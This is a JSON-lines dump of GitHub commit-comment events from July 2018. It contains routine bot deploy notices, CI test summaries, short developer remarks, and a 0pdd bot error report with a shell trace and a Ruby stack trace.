{"id":"7958943219","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29691853,"position":null,"line":null,"path":null,"commit_id":"a7ed123566db279f112b4bacb07448b5aa464092","created_at":"2018-07-12T22:00:16Z","updated_at":"2018-07-12T22:00:16Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [updatersyn](https://updatersyn-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/817e8082cc375aebde4b4103792ee529818c6a56/scripts/deploy-multidev.sh)\n- [/docs/shibboleth-sso](https://updatersyn-static-docs.pantheonsite.io/docs/shibboleth-sso)\n- [scripts/manual-deploy.sh](https://github.com/pantheon-systems/documentation/commit/a7ed123566db279f112b4bacb07448b5aa464092/scripts/manual-deploy.sh)\n"}},"created_at":"2018-07-12T22:00:16Z"}
{"id":"7958944489","type":"CommitCommentEvent","actor":{"login":"ivanbrennan"},"repo":{"name":"ivanbrennan/fakeproject"},"payload":{"comment":{"id":29691858,"position":7,"line":7,"path":"nix/update-gemset","commit_id":"e8f525226303dc563610af3d7f5a258c636e4f2a","created_at":"2018-07-12T22:00:32Z","updated_at":"2018-07-12T22:00:32Z","author_association":"OWNER","body":"@manveru Nice, thanks!"}},"created_at":"2018-07-12T22:00:32Z"}
{"id":"7958946148","type":"CommitCommentEvent","actor":{"login":"dedChar"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29691866,"position":null,"line":null,"path":null,"commit_id":"9ebac1a17c40f1874bcbf2ef149b1c4bf4825167","created_at":"2018-07-12T22:00:56Z","updated_at":"2018-07-12T22:00:56Z","author_association":"COLLABORATOR","body":"if it wasn't for Joey i could've lived my life happily, assuming everyone is a sane person that uses real quotes."}},"created_at":"2018-07-12T22:00:56Z"}
{"id":"7958948150","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"skapral/puzzlerbot"},"payload":{"comment":{"id":29691873,"position":null,"line":null,"path":null,"commit_id":"433dd1c2591bfb931bbbe30967c1c3118add7c09","created_at":"2018-07-12T22:01:24Z","updated_at":"2018-07-12T22:01:24Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot && pdd -v -f /tmp/20180712-1359-1t0r24p [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot && pdd -v -f /tmp/20180712-1359-1t0r24p [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot\n+ pdd -v -f /tmp/20180712-1359-1t0r24p\n\nFound 2 lines in /tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot/.pdd\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading .\nExcluding **/target/**/*\n147 file(s) found, 112 excluded\n/tmp/0pdd20180712-4-7bdj5u/skapral/puzzlerbot/.mvn/wrapper/maven-wrapper.jar is a binary file (48336 bytes)\nReading mvnw.cmd...\nReading .pdd...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/mock/MockSrvImplementationTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/text/threepars/AssertTextInstanceProducesCertainParagraphsTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/text/threepars/TxtStandardTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/puzzle/AssertPuzzleHasCertainTitleAndDescriptionTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/source/AssertPuzzleSourceProducesCertainPuzzlesTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/source/PsrcFromCommentsTest.java...\nReading puzzler-core/src/test/java/com/github/skapral/puzzler/core/config/CpOneOfTest.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/MockSrvImplementation.java...\nPuzzle 69-9dd0b135 0/DEV at puzzler-core/src/main/java/com/github/skapral/puzzler/mock/MockSrvImplementation.java\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/AssertAssumingMockServer.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/AssertHttpEndpointProducesExpectedResponse.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/MockServer.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/mock/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/Text.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TxtStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TriggerWord.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/AssertTextInstanceProducesCertainParagraphs.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TxtBase.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TxtTrim.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TwStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/TxtStandard.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/Paragraph.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/text/threepars/ParStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/OpPersistAllPuzzles.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/OpDoNothing.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/AssertOperationFails.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/OpFail.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/operation/AssertOperationSuccessful.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/PuzzleSource.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/Puzzle.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/Operation.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/puzzle/AssertPuzzleHasCertainTitleAndDescription.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/puzzle/PzlStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/puzzle/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/puzzle/PzlUsingThreeParsText.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/IssueTracker.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/itracker/ItToList.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/itracker/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/AssertPuzzleSourceProducesCertainPuzzles.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/AssertPuzzleSourceProducesNoPuzzles.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/PsrcFromComments.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/PsrcCombined.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/package-info.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/PsrcStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/source/PsrcInferred.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/CpOneOf.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/CpStatic.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/CpEnvironment.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/AssertConfigPropertyHasValue.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/ConfigProperty.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/CpMissingValue.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/AssertConfigPropertyIsUnitialized.java...\nReading puzzler-core/src/main/java/com/github/skapral/puzzler/core/config/package-info.java...\nReading puzzler-core/pom.xml...\nReading DEPLOYMENT.md...\nReading .github/PULL_REQUEST_TEMPLATE.md...\nReading .github/ISSUE_TEMPLATE.md...\nReading pom.xml...\nReading mvnw...\nReading puzzler-app/src/main/java/com/github/skapral/puzzler/app/Bootstrap.java...\nReading puzzler-app/src/main/java/com/github/skapral/puzzler/app/package-info.java...\nReading puzzler-app/pom.xml...\nReading README.md...\nPuzzle 31-c7cfd7be 0/DEV at README.md\nReading deploy.sh...\nReading .gitignore...\nReading Procfile...\nReading .travis.yml...\nReading LICENSE...\nReading .mvn/wrapper/maven-wrapper.properties...\nReading .mvn/wrapper/MavenWrapperDownloader.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/SrvGrizzlyWithJersey.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/Server.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/DefaultExceptionMapper.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/PuzzlerAPI.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/StatusEndpoint.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/GithubHookEndpoint.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/AuthenticationExceptionMapper.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/package-info.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/jersey/GitlabHookEndpoint.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/web/package-info.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/config/Cp_PORT.java...\nReading puzzler-web/src/main/java/com/github/skapral/puzzler/config/package-info.java...\nReading puzzler-web/pom.xml...\nReading puzzler-gitlab/src/test/java/com/github/skapral/puzzler/gitlab/operation/OpValidatingGitlabEventTokenTest.java...\nReading puzzler-gitlab/src/test/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabEventTest.java...\nReading puzzler-gitlab/src/test/resources/testIssueEvent.json...\nReading puzzler-gitlab/src/test/resources/testComments.json...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/text/threepars/TwPuzzlerbotUser.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/text/threepars/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/location/GlapiStatic.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/location/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/location/GitlabAPI.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/location/GlapiProduction.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/operation/OpValidatingGitlabEventToken.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/operation/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/project/GitlabProject.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/project/GprjFromGitlabEvent.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/project/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/itracker/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/itracker/ItGitlabIssues.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabNotes.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabEvent.java...\nPuzzle 27-7995c0a8 0/DEV at puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabEvent.java\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/package-info.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/config/Cp_GITLAB_HOOK_SECRET.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/config/Cp_GITLAB_AUTH_TOKEN.java...\nReading puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/config/package-info.java...\nReading puzzler-gitlab/pom.xml...\nReading puzzler-github/src/test/java/com/github/skapral/puzzler/github/operation/OpIgnoringUnprivildgedEventSenderTest.java...\nReading puzzler-github/src/test/java/com/github/skapral/puzzler/github/operation/OpValidatingGithubEventSignatureTest.java...\nReading puzzler-github/src/test/java/com/github/skapral/puzzler/github/source/PsrcFromGithubCommentsTest.java...\nReading puzzler-github/src/test/java/com/github/skapral/puzzler/github/source/PsrcFromGithubEventTest.java...\nReading puzzler-github/src/test/resources/testIssueEvent.json...\nReading puzzler-github/src/test/resources/testPullRequestEvent.json...\nReading puzzler-github/src/test/resources/com/github/skapral/puzzler/github/operation/ownerIsNotSender...\nReading puzzler-github/src/test/resources/com/github/skapral/puzzler/github/operation/signedBody...\nReading puzzler-github/src/test/resources/com/github/skapral/puzzler/github/operation/ownerIsSender...\nReading puzzler-github/src/test/resources/testComments.json...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/text/threepars/TwPuzzlerbotUser.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/text/threepars/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/location/GhapiStatic.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/location/GithubAPI.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/location/GhapiProduction.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/location/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/operation/OpIgnoringUnprivildgedEventSender.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/operation/OpValidatingGithubEventSignature.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/operation/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/puzzle/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/project/GithubProject.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/project/GprjFromGithubEvent.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/project/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/itracker/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/itracker/ItGithubIssues.java...\nPuzzle 20-c1aa8a54 0/DEV at puzzler-github/src/main/java/com/github/skapral/puzzler/github/itracker/ItGithubIssues.java\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/PsrcFromGithubComments.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/PsrcFromGithubEvent.java...\nPuzzle 27-7995c0a8 0/DEV at puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/PsrcFromGithubEvent.java\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/package-info.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/config/Cp_GITHUB_HOOK_SECRET.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/config/Cp_GITHUB_AUTH_TOKEN.java...\nReading puzzler-github/src/main/java/com/github/skapral/puzzler/github/config/package-info.java...\nReading puzzler-github/pom.xml...\nReading appveyor.yml...\nReading checkstyle.xml...\nReading .0pdd.yml...\nERROR: there are 2 duplicate(s) of the same puzzle: puzzler-gitlab/src/main/java/com/github/skapral/puzzler/gitlab/source/PsrcFromGitlabEvent.java:67-67, puzzler-github/src/main/java/com/github/skapral/puzzler/github/source/PsrcFromGithubEvent.java:67-67, while maximum 1 duplicate is allowed\nERROR: 1 errors, see log above. If you can't understand the cause of this issue or you don't know how to fix it, please submit a GitHub issue, we will try to help you: https://github.com/yegor256/pdd/issues. This tool is still in its beta version and we will appreciate your feedback. Here is where you can find more documentation: https://github.com/yegor256/pdd/blob/master/README.md.\nExit code is 1\n\n/app/objects/git_repo.rb:66:in `rescue in block in xml'\n/app/objects/git_repo.rb:63:in `block in xml'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/tempfile.rb:295:in `open'\n/app/objects/git_repo.rb:62:in `xml'\n/app/objects/puzzles.rb:36:in `deploy'\n/app/objects/job.rb:38:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-12T22:01:24Z"}
{"id":"7958949306","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29691874,"position":null,"line":null,"path":null,"commit_id":"5d9b7b403375264d2cc2663f30c832c7e327fd25","created_at":"2018-07-12T22:01:39Z","updated_at":"2018-07-12T22:01:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-react](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-react).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-react-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T22:01:39Z"}
{"id":"7958955211","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29691893,"position":null,"line":null,"path":null,"commit_id":"d49ecd2a4b0f05cf7d9e0238bfcfd858c3cf75bd","created_at":"2018-07-12T22:03:12Z","updated_at":"2018-07-12T22:03:12Z","author_association":"MEMBER","body":"The bottom portion is really a running parallel entry/translation (starting at the first page and extending through many pages vs. footnote or attachment) so it's a new problem that might require some extra thought.  This formatting, to me, seems more analogous to the double-columned English/French text pages I think I've seen in the backlog.  It's like each page of the compilation is broken into two rows with a 1 pt border between: with the first/top being English language text and the second/bottom being French language text and smaller font, and then the footnotes as treated normal.\r\n\r\nHave you seen anything akin to this before, @vak2ve?"}},"created_at":"2018-07-12T22:03:12Z"}
{"id":"7958955502","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29691895,"position":null,"line":null,"path":null,"commit_id":"4d89755748773cfc357d0cbaf4f8e2cabc2c81fe","created_at":"2018-07-12T22:03:15Z","updated_at":"2018-07-12T22:03:15Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - i386-Windows-7-VisualStudio-14: OK (2933 of 2934 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T22:03:15Z"}
{"id":"7958956936","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29691900,"position":null,"line":null,"path":null,"commit_id":"82ac1c260a01b1c64a355df8bc14bdfecbf012e0","created_at":"2018-07-12T22:03:37Z","updated_at":"2018-07-12T22:03:37Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/82ac1c260a01b1c64a355df8bc14bdfecbf012e0/index.html"}},"created_at":"2018-07-12T22:03:37Z"}
{"id":"7958957598","type":"CommitCommentEvent","actor":{"login":"eskatos"},"repo":{"name":"gradle/kotlin-dsl"},"payload":{"comment":{"id":29691903,"position":null,"line":null,"path":null,"commit_id":"28007ef3ff0910d159028a26fad2a3350add9493","created_at":"2018-07-12T22:03:48Z","updated_at":"2018-07-12T22:03:48Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-12T22:03:48Z"}
{"id":"7958958493","type":"CommitCommentEvent","actor":{"login":"cletusw"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29691909,"position":null,"line":null,"path":null,"commit_id":"c1fd7fbcac1ebb4212c87bd6f25e196faf9421bd","created_at":"2018-07-12T22:04:03Z","updated_at":"2018-07-12T22:04:03Z","author_association":"CONTRIBUTOR","body":"I think the errors are caused by https://github.com/Microsoft/TypeScript/issues/24587. See also https://github.com/Microsoft/TypeScript/issues/1863 .\r\n\r\nI didn't get very far on finding a solution.\r\n\r\nExample error:\r\n```\r\nsrc/SlotContentMixin.js:87:16 - error TS2538: Type 'unique symbol' cannot be used as an index type.\r\n87           this[symbols.raiseChangeEvents] = false;\r\n                  ~~~~~~~~~~~~~~~~~~~~~~~~~\r\n```"}},"created_at":"2018-07-12T22:04:03Z"}
{"id":"7958964927","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29691916,"position":null,"line":null,"path":null,"commit_id":"d38dafcf22745d377ca5ddf5d356c45d83c8c4ac","created_at":"2018-07-12T22:05:43Z","updated_at":"2018-07-12T22:05:43Z","author_association":"CONTRIBUTOR","body":"We know, and we love you anyway :heart: "}},"created_at":"2018-07-12T22:05:43Z"}
{"id":"7958966382","type":"CommitCommentEvent","actor":{"login":"SichongP"},"repo":{"name":"SichongP/SRA_variant_search"},"payload":{"comment":{"id":29691919,"position":null,"line":null,"path":null,"commit_id":"938391fc3ecf3f40ef3fdc5b33b580bf7614a23d","created_at":"2018-07-12T22:06:06Z","updated_at":"2018-07-12T22:06:06Z","author_association":"OWNER","body":"#3 Solved"}},"created_at":"2018-07-12T22:06:06Z"}
{"id":"7958968456","type":"CommitCommentEvent","actor":{"login":"milotic"},"repo":{"name":"DFortun81/AllTheThings"},"payload":{"comment":{"id":29691923,"position":null,"line":null,"path":null,"commit_id":"86f2eba4839f6f1c7df282a7a6b9ba7da92dcead","created_at":"2018-07-12T22:06:38Z","updated_at":"2018-07-12T22:06:38Z","author_association":"NONE","body":"@Lucetia miss the alliance version of the fox http://www.wowhead.com/item=152870/vicious-war-fox"}},"created_at":"2018-07-12T22:06:38Z"}
{"id":"7958968902","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29691924,"position":null,"line":null,"path":null,"commit_id":"0e8b45d746240b23c89b04eb7fc906ed790b07b9","created_at":"2018-07-12T22:06:46Z","updated_at":"2018-07-12T22:06:46Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [updatersyn](https://updatersyn-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/817e8082cc375aebde4b4103792ee529818c6a56/scripts/deploy-multidev.sh)\n- [/docs/shibboleth-sso](https://updatersyn-static-docs.pantheonsite.io/docs/shibboleth-sso)\n- [scripts/manual-deploy.sh](https://github.com/pantheon-systems/documentation/commit/a7ed123566db279f112b4bacb07448b5aa464092/scripts/manual-deploy.sh)\n- [/docs/wp-config-php](https://updatersyn-static-docs.pantheonsite.io/docs/wp-config-php)\n"}},"created_at":"2018-07-12T22:06:46Z"}
